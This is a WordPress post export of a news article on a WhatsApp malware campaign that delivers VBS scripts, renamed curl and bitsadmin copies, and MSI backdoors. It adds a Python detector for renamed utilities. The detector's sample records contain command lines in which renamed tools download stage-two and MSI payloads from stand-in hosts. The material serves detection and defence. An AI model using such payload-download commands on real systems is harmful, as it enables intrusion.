{"id":7667,"date":"2026-04-01T11:19:23","date_gmt":"2026-04-01T11:19:23","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=7667"},"modified":"2026-04-01T11:19:23","modified_gmt":"2026-04-01T11:19:23","slug":"whatsapp-malware-campaign-uses-malicious-vbs-files-to-gain-persistent-access","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=7667","title":{"rendered":"WhatsApp malware campaign uses malicious VBS files to gain persistent access"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<p>Microsoft is warning WhatsApp users about a new malware campaign that tricks them into executing malicious Visual Basic Script (VBS) files, ultimately giving the attackers persistence and remote access.<\/p>\n<p>In a March 31 <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/03\/31\/whatsapp-malware-campaign-delivers-vbs-payloads-msi-backdoors\/\" target=\"_blank\" rel=\"noopener\">report<\/a>, Microsoft Defender Experts said attackers have been distributing the VBS files through WhatsApp since at least late February, relying on social engineering to get recipients to open them.<\/p>\n<p>Once launched, the script does not drop malware immediately. It starts a multi-stage infection flow designed to blend into normal system activity while, in the background, it pulls the additional payloads that provide remote control. \u201cThe campaign relies on a combination of social engineering and living-off-the-land (LOTL) techniques,\u201d Microsoft researchers wrote in the report. 
\u201cBy combining trusted platforms with legitimate tools, the threat actor reduces visibility and increases the likelihood of successful execution.\u201d<\/p>\n<p>The campaign ultimately installs malicious Windows Installer (MSI) packages to maintain control of the infected devices.<\/p>\n<h2 class=\"wp-block-heading\">Campaign deploys a LOTL infection chain<\/h2>\n<p>The attack begins with a WhatsApp message carrying a VBS file. Once executed, the script creates hidden directories on the system and begins staging the next steps of the compromise.<\/p>\n<p>Rather than dropping custom malware at this point, the campaign turns to living-off-the-land techniques. The VBS payload deploys renamed copies of legitimate Windows utilities such as curl.exe and bitsadmin.exe, disguised under misleading filenames to evade casual inspection.<\/p>\n<p>These copies retain their original version metadata: the OriginalFileName in the PE version resource still reads curl.exe or bitsadmin.exe even though the file on disk carries a different name. The altered names let the binaries blend into the environment while they perform tasks such as downloading additional payloads. \u201cMicrosoft Defender and other security solutions can leverage this metadata discrepancy as a detection signal, flagging instances where a file\u2019s name does not match its embedded OriginalFileName,\u201d the report added.<\/p>\n<p>The researchers noted that even payload retrieval happens from legitimate hosting sources. Attackers host components on well-known cloud platforms, including AWS, Tencent Cloud, and Backblaze B2. 
The combination of trusted tools, trusted infrastructure, and staged execution is what makes this a low-noise, reliable attack path, the researchers said.<\/p>\n<h2 class=\"wp-block-heading\">MSI as the backdoor vehicle for persistence<\/h2>\n<p>The final stages of the campaign lead to <a href=\"https:\/\/www.csoonline.com\/article\/2156359\/fortinet-ivanti-zero-day-victims-face-evolved-persistence-by-the-espionage-actor.html\">persistence<\/a>, using Windows Installer (MSI) packages as the delivery mechanism for backdoors.<\/p>\n<p>MSI files are an effective choice because they are not usually treated as inherently suspicious and can <a href=\"https:\/\/www.cybereason.com\/blog\/threat-analysis-msi-masquerading-as-software-installer\" target=\"_blank\" rel=\"noopener\">execute<\/a> custom actions during installation, which lets an installer run arbitrary code on the host. In this campaign, they are used to deploy malware that maintains access, escalates privileges, and enables <a href=\"https:\/\/www.csoonline.com\/article\/4151203\/attackers-exploit-critical-langflow-rce-within-hours-as-cisa-sounds-alarm.html\">remote control<\/a> of infected systems.<\/p>\n<p>By the time the MSI component is installed, the attackers have already established a foothold using scripts and system tools, so the backdoor is just one layer in the broader persistence strategy Microsoft observed. The earlier stages prepare the environment, while the installer formalizes long-term access.<\/p>\n<p>Microsoft also noted that the campaign incorporates privilege escalation to strengthen persistence, enabling the malware to run with elevated privileges and to maintain access beyond the initial user-level compromise. 
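<\/p>\n<p>The mismatch check the report describes, as an added worked example that is not part of the original article or of the Microsoft report: it compares the on-disk file name of each new process with the OriginalFileName from its version resource, raises the severity when that original name is curl.exe or bitsadmin.exe, and raises it again when the parent is the Windows Script Host (wscript.exe or cscript.exe, which is what runs a .vbs file). It assumes Sysmon Event ID 1 field names (Image, OriginalFileName, ParentImage, CommandLine); the sample records are constructed, not real telemetry. The same comparison can be made in Microsoft Defender Advanced Hunting over DeviceProcessEvents, where the version-resource name is the ProcessVersionInfoOriginalFileName column.<\/p>\n
```python
'''Renamed-utility detection over process-creation records.

Added example, not code from the article or the Microsoft report. Field names
follow Sysmon Event ID 1 (Image, OriginalFileName, ParentImage, CommandLine);
the sample records below are constructed, not real telemetry.
'''
import ntpath

# Utilities the report names as renamed and abused for payload download.
DOWNLOAD_LOLBINS = {'curl.exe', 'bitsadmin.exe'}
# Windows Script Host binaries, i.e. what actually runs a .vbs file.
SCRIPT_HOSTS = {'wscript.exe', 'cscript.exe'}

# Constructed sample records (assumed field names, invented values).
SAMPLE_EVENTS = [
    # Benign: curl under its own name, started from a shell.
    {'Image': 'C:\\Windows\\System32\\curl.exe',
     'OriginalFileName': 'curl.exe',
     'ParentImage': 'C:\\Windows\\System32\\cmd.exe',
     'CommandLine': 'curl.exe -sS https://updates.example.invalid/manifest.json'},
    # Benign: version-resource casing differs from the on-disk name, which is common.
    {'Image': 'C:\\Windows\\System32\\cmd.exe',
     'OriginalFileName': 'Cmd.Exe',
     'ParentImage': 'C:\\Windows\\explorer.exe',
     'CommandLine': 'cmd.exe'},
    # Unknown: no version resource, so the signal cannot be applied.
    {'Image': 'C:\\Tools\\build\\helper.exe',
     'OriginalFileName': '',
     'ParentImage': 'C:\\Windows\\System32\\cmd.exe',
     'CommandLine': 'helper.exe'},
    # High: renamed copy of curl launched by the script host running a .vbs file.
    {'Image': 'C:\\Users\\Public\\Libraries\\svcupd.exe',
     'OriginalFileName': 'curl.exe',
     'ParentImage': 'C:\\Windows\\System32\\wscript.exe',
     'CommandLine': 'svcupd.exe -s -o C:\\Users\\Public\\Libraries\\stage2.dat https://bucket.example.invalid/stage2'},
    # Medium: renamed bitsadmin, but the parent is a plain shell.
    {'Image': 'C:\\ProgramData\\cache\\winsync.exe',
     'OriginalFileName': 'bitsadmin.exe',
     'ParentImage': 'C:\\Windows\\System32\\cmd.exe',
     'CommandLine': 'winsync.exe /transfer job /download /priority normal https://cdn.example.invalid/p.msi C:\\ProgramData\\cache\\p.msi'},
    # Low: renamed, but not one of the download utilities (a vendor-renamed tool).
    {'Image': 'C:\\Program Files\\Vendor\\vendortool.exe',
     'OriginalFileName': 'tool.exe',
     'ParentImage': 'C:\\Windows\\explorer.exe',
     'CommandLine': 'vendortool.exe'},
]


def name_mismatch(event):
    '''True if the on-disk name differs from the embedded OriginalFileName,
    False if they agree, None if the binary carries no OriginalFileName.'''
    original = (event.get('OriginalFileName') or '').strip()
    if not original:
        return None
    # ntpath handles Windows separators even when this runs on Linux.
    on_disk = ntpath.basename(event['Image'])
    return on_disk.lower() != original.lower()   # case-insensitive, see Cmd.Exe


def classify(event):
    '''Severity of one record under the renamed-utility signal.'''
    mismatch = name_mismatch(event)
    if mismatch is None:
        return 'unknown'
    if not mismatch:
        return 'benign'
    original = event['OriginalFileName'].strip().lower()
    parent = ntpath.basename(event.get('ParentImage', '')).lower()
    if original in DOWNLOAD_LOLBINS and parent in SCRIPT_HOSTS:
        return 'high'      # renamed downloader spawned by Windows Script Host
    if original in DOWNLOAD_LOLBINS:
        return 'medium'    # renamed downloader, any parent
    return 'low'           # renamed, but not a known download utility


def triage(events):
    '''Findings for every record that is not benign, most severe first.'''
    rank = {'high': 0, 'medium': 1, 'low': 2, 'unknown': 3}
    findings = []
    for event in events:
        verdict = classify(event)
        if verdict != 'benign':
            findings.append({'verdict': verdict,
                             'image': event['Image'],
                             'original': event.get('OriginalFileName', ''),
                             'parent': event.get('ParentImage', '')})
    findings.sort(key=lambda finding: rank[finding['verdict']])
    return findings


if __name__ == '__main__':
    for finding in triage(SAMPLE_EVENTS):
        shown = finding['original'] or '(no OriginalFileName)'
        print(finding['verdict'].upper(), finding['image'], 'is really', shown)
```
\n<p>Run as a script it prints the non-benign findings, most severe first. Two caveats keep the signal usable in practice: the comparison must be case-insensitive, because many Windows binaries store a differently cased name in the version resource (Cmd.Exe for cmd.exe), and a file with no OriginalFileName at all cannot be judged by this check, so it is reported separately rather than silently treated as clean.<\/p>\n<p>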
Recommendations included monitoring scripts and installer execution, watching for misuse of legitimate tools, and tracking suspicious activity tied to files delivered through platforms like WhatsApp.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Microsoft is warning WhatsApp users of a new malware campaign that tricks them into executing malicious Visual Basic Script (VBS) files, ultimately enabling persistence and remote access. In a March 31 report, Microsoft Defender Experts said attackers have been distributing malicious Visual Basic Script (VBS) files through WhatsApp since at least late February, relying on [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":7668,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-7667","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7667"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7667"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7667\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/7668"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7667"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7667"},{"taxonomy":"post_tag"
,"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7667"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}